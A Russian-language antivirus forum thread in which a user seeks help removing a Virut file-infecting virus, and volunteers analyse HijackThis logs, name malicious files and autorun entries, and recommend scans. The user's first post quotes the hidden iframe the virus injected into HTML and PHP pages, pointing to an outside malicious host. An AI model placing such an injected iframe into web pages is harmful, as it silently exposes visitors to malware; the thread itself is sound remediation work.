10 ответов в этой теме

[Ратмир]

Вирус заражает находящиеся на диске C: исполняемые файлы (в основном .exe, но возможно не только), дописывая до каждого из них 18944 байта своего кода, особенно усердствуя в папке C:\Windows\system32\. При запуске системы (Windows XP SP3 SATA) появляются новые, неизвестные процессы (например, один из них имеет имя "reader_s"), которые вероятно и производят эти действия. Завершение этих процессов ни к чему не приводит, так как они тут же перезапускаются.

В результате действия вируса во всех .html и .php файлах на диске C:, а также на других дисках в тех папках, которые открывались в Проводнике или TotalCommander, начинает перед тегом "</body>" в бесконечном цикле добавлятся следующая строчка:

<iframe src=&#34;http&#58;//jL.chura.pl/rc/&#34; style=&#34;display&#58;none&#34;></iframe>

Проверка компьютера антивирусом AVP 7.0 с последним обновлением базы, а также программой SUPERAntiSpyware ни привели к желаемому результату - они нашли и уничтожили с десяток вирусов и троянов, однако этот выловить так и не смогли. После перезагрузки и повторной проверки антивирусами новых вирусов не найдено, однако этот продолжает работу

Для более детальной проверки был установлена ещё одна идентичная ОС (Windows XP SP3 SATA) на диск C: в папку Windows.0. Компьютер в этой версии ОС нормально запускается, вирус себя никак не проявляет, однако при попытке загрузится в старой ОС сразу же начинает действовать. Полные проверки всех дисков с включением детального эвристического анализа через новую ОС ничего не дают, вирус не находится. Замена всех изменённых файлов в папке Windows на оригинальные файлы из Windows.0, а также удаление всей информации из временных папок (в т.ч. Temporary intetnet files как в папке Windows, так и во всех профилях) - не помогает, при загрузке в старой ОС он откуда-то вылазить и вновь начинает гадить.

В конце-концов помог CureIt - выщемил 132 экземпляра вируса Virus.Win32.Virut.56, однако 100%-й уверенности нет, потому скачал все рекомендуемые программы и провёл анализы, которые прикреплены ниже. Может кто точно сказать, вывел я эту гадость окончательно или нет?

Прикрепленные файлы:

•  cureit_results.cab   85,04К   106 Скачано раз
•  gmer.log   5,59К   116 Скачано раз
•  hijack.log   7,35К   113 Скачано раз
•  RkU.txt   106К   65 Скачано раз

[YVS]

Отошлите в Вирлаб:
C:\WINDOWS\system32\actcontroller.exe
C:\WINDOWS\system32\9.tmp.exe
C:\WINDOWS\System32\reader_s.exe
C:\Documents and Settings\Ratmir\reader_s.exe
c:\program Files\ThunMail\testabd.exe
c:\progra~1\ThunMail\testabd.dll

З.Ы. А Касперчегу не тесно на машине с Авастом?

[YVS]

Пофиксите в Хайджеке и проверьте, не появятся ли вновь записи:
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\actcontroller.exe,
O4 - HKLM\..\Run: [13870] C:\WINDOWS\system32\9.tmp.exe
O4 - HKLM\..\Run: [reader_s] C:\WINDOWS\System32\reader_s.exe
O4 - HKCU\..\Run: [reader_s] C:\Documents and Settings\Ratmir\reader_s.exe
O4 - HKUS\S-1-5-18\..\Run: [svc] c:\program Files\ThunMail\testabd.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [svc] c:\program Files\ThunMail\testabd.exe (User 'Default user')
O20 - AppInit_DLLs: c:\progra~1\ThunMail\testabd.dll
O23 - Service: Dhcp server (DhcpSrv) - Unknown owner - C:\WINDOWS\dhcp\svchost.exe (file missing)
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Unknown owner - C:\WINDOWS\system32\agrsmsvc.exe (file missing)

[YVS]

Это Ваши настройки?

O17 - HKLM\System\CCS\Services\Tcpip\..\{1969FAC8-10C1-4C96-A472-E8F563CC5CF9}: NameServer = 82.209.253.4 82.209.253.2
O17 - HKLM\System\CCS\Services\Tcpip\..\{4BF93D21-A150-42D8-999A-6A279991172C}: NameServer = 82.209.253.2,193.232.248.2
O17 - HKLM\System\CS1\Services\Tcpip\..\{1969FAC8-10C1-4C96-A472-E8F563CC5CF9}: NameServer = 82.209.253.4 82.209.253.2
O17 - HKLM\System\CS2\Services\Tcpip\..\{1969FAC8-10C1-4C96-A472-E8F563CC5CF9}: NameServer = 82.209.253.4 82.209.253.2

[pig]

Это как бы честные DNS Белтелекома. В основном, минская сеть. Пациент из Минска, всё верно.

[mrbelyash]

1)Файлы на вирустотал
C:\Documents and Settings\All Users\Application Data\0A7C97773C.sys
C:\Documents and Settings\All Users\Application Data\KGyGaAvL.sys
2)Virus.Win32.Virut.56-это не наша классификация.
Дальнейшие действия
1)Отключиться от сети
2)Загрузиться в безопасном режиме(желательно)
3)Просканировать все жесткие диски свежим CureIT (Virut -это файловый вирус,поэтому может быть заражено гораздо больше файлов по всем дискам).
Обязательно в настройках CureIT увеличить размер отчета до 5-6 Мб
4)Сжать архиватором отчет и приложить здесь.

Сообщение было изменено mrbelyash: 09 Апрель 2009 - 10:55

[Ратмир]

YVS, там как раз и были вирусяги, и CureIt! их снёс Ну а Касперский, в свою очередь, снёс Аваст при своей установке http://forum.drweb.com/public/style_emoticons/default/biggrin.png В Хайджэке пофиксил всё, что посоветовали, вновь ничего не появляется, кроме драйвера модема.

mrbelyash, файлы, что вы просили, присоединил к сообщению. Отчёт, к сожалению, сейчас сделать не могу, но как только - так сразу

VirusTotal:
0A7C97773C.sys
KGyGaAvL.sys

Просили не сами файлы, а результат их проверки на VirusTotal //YVS

[YVS]

Ну а Касперский, в свою очередь, снёс Аваст при своей установке

У Вас остался драйвер Аваста (aswSP.SYS) - надо было перед установкой другого АВ удалить Аваст штатными средствами.

Если самого Аваста уже нет - лучше его [драйвер] удалить.

Сообщение было изменено YVS: 13 Апрель 2009 - 14:14
Добавил сообщение

[userr]

файлы, что вы просили, присоединил к сообщению.

1. Нельзя помещать подозрительные файлы на форум.
2. Никто Вас не просил это делать. Внимательнее.

Замечание.
Модератор.

[IgorKr]

http://files.avast.com/files/eng/aswclear.exe (Avast) - утилита с сайта производителя по удалению продукта.
Загружатся надо в Safe Mode и там запускать.

[Ратмир]

Благодарю за ответы, с Авастом уже без разницы - пришлось-таки в итоге переустановить Windows А то уж очень неадекватно стал работать, модемы отказывались соединятся, поиск не работал, короче... Насчёт файлов извините, не разобрался с ходу, другой раз буду внимательнее (хотя надеюсь, что другого раза просто не будет ). Думаю, большего, чем я сделал, уже и не требуется, так что тему закрываю, всем спасибо за ответы!